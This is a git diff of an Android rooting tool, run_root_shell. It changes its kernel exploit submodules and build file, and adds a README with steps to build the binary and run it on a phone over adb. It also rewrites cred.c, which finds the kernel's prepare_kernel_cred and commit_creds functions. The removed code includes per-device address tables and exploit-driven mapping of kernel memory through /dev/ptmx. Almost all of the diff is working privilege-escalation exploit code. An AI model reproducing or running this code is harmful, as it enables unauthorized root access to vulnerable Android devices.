kjjkkj

.gitmodules

@@ -1,12 +1,9 @@
-[submodule "libdiagexploit"]
-	path = libdiagexploit
-	url = git://github.com/hiikezoe/libdiagexploit.git
 [submodule "device_database"]
 	path = device_database
-	url = git://github.com/fi01/android_device_database.git
-[submodule "libperf_event_exploit"]
-	path = libperf_event_exploit
-	url = git://github.com/hiikezoe/libperf_event_exploit.git
-[submodule "libmsm_acdb_exploit"]
-	path = libmsm_acdb_exploit
-	url = git://github.com/fi01/libmsm_acdb_exploit.git
+	url = https://github.com/android-rooting-tools/android_device_database.git
+[submodule "libkallsyms"]
+	path = libkallsyms
+	url = https://github.com/android-rooting-tools/libkallsyms.git
+[submodule "libexploit"]
+	path = libexploit
+	url = https://github.com/android-rooting-tools/libexploit.git

Android.mk

@@ -11,12 +11,15 @@ LOCAL_SRC_FILES := \
 
 LOCAL_MODULE := run_root_shell
 LOCAL_MODULE_TAGS := optional
-LOCAL_FORCE_STATIC_EXECUTABLE := true
-LOCAL_STATIC_LIBRARIES := libdiagexploit
-LOCAL_STATIC_LIBRARIES += libdevice_database
-LOCAL_STATIC_LIBRARIES += libperf_event_exploit
-LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit
+LOCAL_STATIC_LIBRARIES := libdevice_database
+LOCAL_STATIC_LIBRARIES += libexploit
+LOCAL_STATIC_LIBRARIES += libkallsyms
 LOCAL_STATIC_LIBRARIES += libcutils libc
+LOCAL_LDFLAGS += -static
+
+TOP_SRCDIR := $(abspath $(LOCAL_PATH))
+TARGET_C_INCLUDES += \
+  $(TOP_SRCDIR)/device_database
 
 include $(BUILD_EXECUTABLE)
 

README.md

@@ -1,3 +1,50 @@
-#
+android_run_root_shell
+======================
 
 This code is still ugly, please re-write it and send pull-requests, if you want to use this.
+
+
+Building
+========
+
+* Download the Android Native Development Kit (NDK): http://developer.android.com/tools/sdk/ndk/index.html#Downloads
+
+* Extract into some directory and put that in your path: 
+	`export PATH=ANDK_DIR:$PATH`
+
+* In another directory clone this repo: 
+	`git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell`
+
+* Change to the directory where the repo was cloned
+	`cd android_run_root_shell`
+
+* To start build process use the following
+	`ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk`
+
+* If all goes well you will get the compiled binary at:
+	`./libs/armeabi/run_root_shell`
+
+
+Running
+=======
+
+* Download the Android Software Development Kit (SDK) ADT Bundle: http://developer.android.com/sdk/index.html
+
+* Extract into some directory and put the platform-tools folder in your path:
+	`export PATH=SDK_DIR/sdk/platform-tools/:$PATH`
+
+* Change to the directory with the compiled run_root_shell binary (see above)
+
+* Connect your Android device through USB (click Cancel if it asks to enable USB storage; charging only is the correct mode) and enable USB debugging on the device.
+
+* Start the adb server on your computer:
+	`sudo adb start-server`
+
+* Transfer run_root_shell to a temporary directory on the phone:
+	`adb push run_root_shell /data/local`
+
+* Ensure that run_root_shell has execute permissions:
+	`adb shell chmod 777 /data/local/run_root_shell`
+
+* Run the command on the phone:
+	`adb shell /data/local/run_root_shell`

cred.c

@@ -1,195 +1,104 @@
 #include <errno.h>
 #include <stdio.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <unistd.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sys/mman.h>
 
 #include "cred.h"
 #include "mm.h"
-#include "ptmx.h"
-#include "libdiagexploit/diag.h"
 #include "kallsyms.h"
-#include "libperf_event_exploit/perf_event.h"
 #include "device_database/device_database.h"
 
-typedef struct _supported_device {
-  device_id_t device_id;
-  unsigned long int prepare_kernel_cred_address;
-  unsigned long int commit_creds_address;
-} supported_device;
-
-static supported_device supported_devices[] = {
-  { DEVICE_IS17SH_01_00_04,   0xc01c66a8, 0xc01c5fd8 },
-  { DEVICE_SH04E_01_00_02,    0xc008d86c, 0xc008d398 },
-  { DEVICE_SH04E_01_00_03,    0xc008d99c, 0xc008d4c8 },
-  { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 },
-  { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 },
-  { DEVICE_HTL21_1_29_970_1,  0xc00ab9d8, 0xc00ab4c4 },
-  { DEVICE_HTL22_1_05_970_1,  0xc00b2688, 0xc00b2174 },
-  { DEVICE_HTL22_1_07_970_4,  0xc00b26a0, 0xc00b218c },
-  { DEVICE_HTX21_1_20_971_1,  0xc00a6e54, 0xc00a6940 },
-  { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 },
-  { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc },
-  { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 },
-  { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c },
-  { DEVICE_N05E_A1000311,     0xc0094430, 0xc0093ebc }
-};
-
-static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]);
+prepare_kernel_cred_t prepare_kernel_cred;
+commit_creds_t commit_creds;
 
-static bool
-get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address)
+bool
+setup_prepare_kernel_cred_address(void)
 {
-  int i;
-  device_id_t device_id;
-
-  device_id = detect_device();
-
-  for (i = 0; i < n_supported_devices; i++) {
-    if (supported_devices[i].device_id == device_id){
-      if (prepare_kernel_cred_address) {
-        *prepare_kernel_cred_address = (void*)supported_devices[i].prepare_kernel_cred_address;
-      }
-      if (commit_creds_address) {
-        *commit_creds_address = (void*)supported_devices[i].commit_creds_address;
-      }
-      return true;
-    }
+  if (prepare_kernel_cred) {
+    return true;
   }
 
-  print_reason_device_not_supported();
-
-  return false;
-}
-
-static uint32_t PAGE_OFFSET = 0xC0000000;
+  prepare_kernel_cred = (prepare_kernel_cred_t)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred));
 
-static void *
-convert_to_kernel_address(void *address, void *mmap_base_address)
-{
-  return address - mmap_base_address + (void*)PAGE_OFFSET;
-}
+  if (!prepare_kernel_cred && kallsyms_exist()) {
+    prepare_kernel_cred = kallsyms_get_symbol_address("prepare_kernel_cred");
+  }
 
-static void *
-convert_to_mmaped_address(void *address, void *mmap_base_address)
-{
-  return mmap_base_address + (address - (void*)PAGE_OFFSET);
+  return !!prepare_kernel_cred;
 }
 
-static uint32_t prepare_kernel_cred_asm[] = { 0xe59f30bc, 0xe3a010d0, 0xe92d4070, 0xe1a04000 };
-static size_t prepare_kernel_cred_asm_length = sizeof(prepare_kernel_cred_asm);
-static void *
-find_prepare_kernel_cred(void *mem, size_t length)
+bool
+setup_commit_creds_address(void)
 {
-  void *prepare_kernel_cred;
-
-  prepare_kernel_cred = memmem(mem, length, &prepare_kernel_cred_asm, prepare_kernel_cred_asm_length);
-  if (!prepare_kernel_cred) {
-    printf("Couldn't find prepare_kernel_cred address\n");
-    return NULL;
+  if (commit_creds) {
+    return true;
   }
 
-  return prepare_kernel_cred;
-}
-
-static uint32_t commit_creds_asm[] = { 0xe92d4070, 0xe1a0200d, 0xe3c23d7f, 0xe1a05000 };
-static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm);
-static void *
-find_commit_creds(void *mem, size_t length)
-{
-  void *commit_creds;
+  commit_creds = (commit_creds_t)device_get_symbol_address(DEVICE_SYMBOL(commit_creds));
 
-  commit_creds = memmem(mem, length, &commit_creds_asm, commit_creds_asm_length);
-  if (!commit_creds) {
-    printf("Couldn't find commit_creds address\n");
-    return NULL;
+  if (!commit_creds && kallsyms_exist()) {
+    commit_creds = kallsyms_get_symbol_address("commit_creds");
   }
 
-  return commit_creds;
+  return !!commit_creds;
 }
 
-#define KERNEL_SIZE 0x10000000
+static uint32_t prepare_kernel_cred_asm[] = { 0xe59f30bc, 0xe3a010d0, 0xe92d4070, 0xe1a04000 };
+static size_t prepare_kernel_cred_asm_length = sizeof(prepare_kernel_cred_asm);
 
 static bool
-find_creds_functions_with_mmap(void *user_data)
+find_prepare_kernel_cred_address_in_memory(void *mem, size_t length)
 {
-  int fd;
   void *address;
-  void *start_address = (void*) 0x10000000;
-
-  fd = open(PTMX_DEVICE, O_RDWR);
-  address = mmap(start_address, KERNEL_SIZE,
-                 PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED,
-                 fd, 0);
-  if (address == MAP_FAILED) {
-    printf("Failed to mmap /dev/ptmx due to %s.\n", strerror(errno));
-    close(fd);
-    return false;
-  }
 
-  prepare_kernel_cred = find_prepare_kernel_cred(address, KERNEL_SIZE);
   if (prepare_kernel_cred) {
-    commit_creds = find_commit_creds(prepare_kernel_cred + 4, KERNEL_SIZE);
-
-    prepare_kernel_cred = convert_to_kernel_address(prepare_kernel_cred, address);
-    commit_creds = convert_to_kernel_address(commit_creds, address);
+    return true;
   }
 
-  munmap(address, KERNEL_SIZE);
-
-  close(fd);
-
-  return prepare_kernel_cred && commit_creds;
-}
-
-static bool
-find_with_diag_exploit(unsigned int ptmx_mmap_address)
-{
-  struct diag_values injection_data;
-
-  injection_data.address = ptmx_mmap_address;
-  injection_data.value = (uint16_t)&ptmx_mmap;
+  address = (prepare_kernel_cred_t)memmem(mem, length, &prepare_kernel_cred_asm, prepare_kernel_cred_asm_length);
+  if (!address) {
+    return false;
+  }
 
-  return diag_run_exploit(&injection_data, 1,
-                          find_creds_functions_with_mmap, NULL);
+  prepare_kernel_cred = (prepare_kernel_cred_t)convert_to_kernel_address(address, mem);
+  return true;
 }
 
-static bool
-find_with_perf_swevent_exploit(unsigned int ptmx_mmap_address)
-{
-  return perf_swevent_run_exploit(ptmx_mmap_address, (int)&ptmx_mmap,
-                                  find_creds_functions_with_mmap, NULL);
-}
+static uint32_t commit_creds_asm[] = { 0xe92d4070, 0xe1a0200d, 0xe3c23d7f, 0xe1a05000 };
+static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm);
 
 static bool
-find_creds_functions_in_memory(void)
+find_commit_creds_address_in_memory(void *mem, size_t length)
 {
-  unsigned long int ptmx_mmap_address;
+  void *address;
 
-  ptmx_mmap_address = get_ptmx_fops_address() + 0x28;
+  if (commit_creds) {
+    return true;
+  }
 
-  if (diag_is_supported()) {
-    return find_with_diag_exploit(ptmx_mmap_address);
+  address = (commit_creds_t)memmem(mem, length, &commit_creds_asm, commit_creds_asm_length);
+  if (!address) {
+    return false;
   }
-  return find_with_perf_swevent_exploit(ptmx_mmap_address);
+
+  commit_creds = (commit_creds_t)convert_to_kernel_address(address, mem);
+  return true;
 }
 
 bool
-setup_creds_functions(void)
+setup_prepare_kernel_cred_address_in_memory(void *mem, size_t length)
 {
-  if (kallsyms_exist()) {
-    prepare_kernel_cred = kallsyms_get_symbol_address("prepare_kernel_cred");
-    commit_creds = kallsyms_get_symbol_address("commit_creds");
+  if (prepare_kernel_cred) {
     return true;
   }
 
-  if (get_creds_functions_addresses((void**)&prepare_kernel_cred, (void**)&commit_creds)) {
+  return find_prepare_kernel_cred_address_in_memory(mem, length);
+}
+
+bool
+setup_commit_creds_address_in_memory(void *mem, size_t length)
+{
+  if (commit_creds) {
     return true;
   }
 
-  return find_creds_functions_in_memory();
+  return find_commit_creds_address_in_memory(mem, length);
 }
-

cred.h

@@ -19,14 +19,22 @@
 #define CREDS_H
 
 #include <stdbool.h>
+#include <stdio.h>
 
 struct cred;
 struct task_struct;
 
-bool setup_creds_functions(void);
+typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *);
+typedef int (*commit_creds_t)(struct cred *);
 
-struct cred *(*prepare_kernel_cred)(struct task_struct *);
-int (*commit_creds)(struct cred *);
+extern bool setup_prepare_kernel_cred_address();
+extern bool setup_commit_creds_address();
+
+extern bool setup_prepare_kernel_cred_address_in_memory(void *mem, size_t length);
+extern bool setup_commit_creds_address_in_memory(void *mem, size_t length);
+
+extern prepare_kernel_cred_t prepare_kernel_cred;
+extern commit_creds_t commit_creds;
 
 #endif /* CREDS_H */
 /*